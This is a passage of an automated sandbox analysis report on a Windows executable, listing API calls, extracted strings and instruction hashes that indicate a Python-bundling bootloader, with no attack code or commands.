                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _fread_nolock
                                                                                      • String ID:
                                                                                      • API String ID: 840049012-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(?,?,00000000,00007FF7F3DEB32A,?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A), ref: 00007FF7F3DEEBED
                                                                                      Similarity
                                                                                      • API ID: AllocHeap
                                                                                      • String ID:
                                                                                      • API String ID: 4292702814-0
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF7F3DE0C90,?,?,?,00007FF7F3DE22FA,?,?,?,?,?,00007FF7F3DE3AE9), ref: 00007FF7F3DED63A
                                                                                      Similarity
                                                                                      • API ID: AllocHeap
                                                                                      • String ID:
                                                                                      • API String ID: 4292702814-0
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5840
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5852
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5889
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD589B
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58B4
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58C6
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58DF
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD58F1
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD590D
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD591F
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD593B
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD594D
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5969
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD597B
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD5997
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59A9
                                                                                      • GetProcAddress.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59C5
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD64CF,?,00007FF7F3DD336E), ref: 00007FF7F3DD59D7
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastProc
                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                      • API String ID: 199729137-653951865
                                                                                      • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                      • Instruction ID: 0de6f68d3225384e993f8530148b715efc1bdc2936629a268c8503234246543b
                                                                                      • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                      • Instruction Fuzzy Hash: B322AC6490EB0B91FBD5BBE5B890574B361AF05795FC41035D83E2A2D8EF3CB16892E0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 808467561-2761157908
                                                                                      • Opcode ID: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                      • Instruction ID: 780b6cf53771bb597d6389d0adc5754d3a403e81600ac74437f3c6d6ac4647bd
                                                                                      • Opcode Fuzzy Hash: 7da0388417e7c773b0aab48e07e342724827a26e5879d16e5decf6c79e081c8c
                                                                                      • Instruction Fuzzy Hash: 34B2B772E182824BE7A59EB4D4807FDB7B1FB54348F905135DA3D6BAC8DB38A500CB90
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD842B
                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84AE
                                                                                      • DeleteFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84CD
                                                                                      • FindNextFileW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84DB
                                                                                      • FindClose.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84EC
                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7F3DD8919,00007FF7F3DD3F9D), ref: 00007FF7F3DD84F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                      • String ID: %s\*
                                                                                      • API String ID: 1057558799-766152087
                                                                                      • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                      • Instruction ID: d104ce573da2afe3cc8f65e3ca4dda28ce192aa84e5df8c9beee24b0e23e353d
                                                                                      • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                      • Instruction Fuzzy Hash: 57415521A0C54285EBA1BBB4E4941FAB361FB94754FC00231D97E6B7D8DF3CE5498790
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                      • API String ID: 0-2665694366
                                                                                      • Opcode ID: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                      • Instruction ID: ee0a07d1a990cd9b53e6c6a81cbfb5da2d1737dafaf08342e144390a14a0f465
                                                                                      • Opcode Fuzzy Hash: 14409f6b5173d9f28888b9fb9c68bcc2b54b8e7def706e6c40ef53002486e1ba
                                                                                      • Instruction Fuzzy Hash: E3522972A146A64BD7E89F64C458B7D7BADFB44344F818139EA5A9B7C0DB3CD800CB90
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3140674995-0
                                                                                      • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                      • Instruction ID: f02e511d704974825d1110e40f2446076dbc38835b2a37fc8baf5b5eafcf440e
                                                                                      • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                      • Instruction Fuzzy Hash: AC314572609B8186EBA09FA0E8807ED7364FB85748F444039DA5D5BBD9DF3CD648C760
                                                                                      APIs
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5C45
                                                                                        • Part of subcall function 00007FF7F3DF5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55AC
                                                                                        • Part of subcall function 00007FF7F3DEA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                        • Part of subcall function 00007FF7F3DEA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F3DEA8DF,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEA909
                                                                                        • Part of subcall function 00007FF7F3DEA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F3DEA8DF,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEA92E
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5C34
                                                                                        • Part of subcall function 00007FF7F3DF55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF560C
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EAA
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EBB
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5ECC
                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F3DF610C), ref: 00007FF7F3DF5EF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 4070488512-0
                                                                                      • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                      • Instruction ID: ce22389b0d4238fabec1117b19ec90c686226e4584af794b52388409d4679bd6
                                                                                      • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                      • Instruction Fuzzy Hash: C4D1D322A0824646E7A4BF71D8801B9E752EF94794FC48135EA3E6F7D9DF3CE44187A0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 1239891234-0
                                                                                      • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                      • Instruction ID: d277a1c71338f8291452321b88f62b3e03fdd158b2b04791860cff91d12c42ab
                                                                                      • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                      • Instruction Fuzzy Hash: 21319432608F8285DBA4DF74E8802AEB7A4FB85758F900135EAAD57B99DF3CC145CB50
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 2227656907-0
                                                                                      • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                      • Instruction ID: 9d6aa7df9ac7cfe7ce49a40c7a8e33845df1d62af64414c4ce23ecc254a164ac
                                                                                      • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                      • Instruction Fuzzy Hash: 36B1C762B1869241EBA5ABB195401B9E354FB45BE4FC44231ED7D2FBC9DF3CE4418390
                                                                                      APIs
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EAA
                                                                                        • Part of subcall function 00007FF7F3DF55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF560C
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5EBB
                                                                                        • Part of subcall function 00007FF7F3DF5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55AC
                                                                                      • _get_daylight.LIBCMT ref: 00007FF7F3DF5ECC
                                                                                        • Part of subcall function 00007FF7F3DF55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DF55DC
                                                                                        • Part of subcall function 00007FF7F3DEA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F3DF610C), ref: 00007FF7F3DF5EF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                      • String ID:
                                                                                      • API String ID: 3458911817-0
                                                                                      • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                      • Instruction ID: 5a6dba40920c9645f2ea863ef8199061851d97349b4016abef8d2f7b12cae3e4
                                                                                      • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                      • Instruction Fuzzy Hash: 1A518022A0864246E790FF71D8C11A9E761BF58794FC44135EA7E6B7D9DF3CE44087A0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      Similarity
                                                                                      • API ID: memcpy_s
                                                                                      • String ID:
                                                                                      • API String ID: 1502251526-0
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $header crc mismatch$unknown header flags set
                                                                                      • API String ID: 0-1127688429
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                      • String ID:
                                                                                      • API String ID: 15204871-0
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $
                                                                                      • API String ID: 0-227171996
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: incorrect header check$invalid window size
                                                                                      • API String ID: 0-900081337
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: e+000$gfff
                                                                                      • API String ID: 0-3030954782
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: gfffffff
                                                                                      • API String ID: 0-1523873471
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: TMP
                                                                                      • API String ID: 3215553584-3125297090
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                      • Instruction ID: 0bdb1d588c16533388a992f0c83006ada29d3a2ba2fe3e31b932aefb5a8fdd37
                                                                                      • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                      • Instruction Fuzzy Hash: D4B09220E07A02C2EB883B616CC2218A2A47F68710FD80178C46D68370DE2C21E597A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                      • Instruction ID: 84db886a7d81b801591252f4578ee71e944f7c56f360401b32549a26f55bc591
                                                                                      • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                      • Instruction Fuzzy Hash: F9D1EB72A0864245EBECAE65844023DBBA0EF45B48F940339CD2D2B7D5CF3DD885D7A2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                      • Instruction ID: 2b95364da92b26a795d57a21af260ce14cf31a4e46a9d3cecbb58fc1d7c11632
                                                                                      • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                      • Instruction Fuzzy Hash: 06C18D762181E08BD28AEB29E46947A73E1F78930DBD5806BEF87477C5C63CA414DB60
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                      • Instruction ID: 8796c4775724102ea6b4711c764cd178ce622ec9e778fbf941e1b96070d76eba
                                                                                      • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                      • Instruction Fuzzy Hash: 11B17E72908B5585E7A8AF69C05013CBFA0E749F48FA40235CB5E6B3D5CF39D481C7A6
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
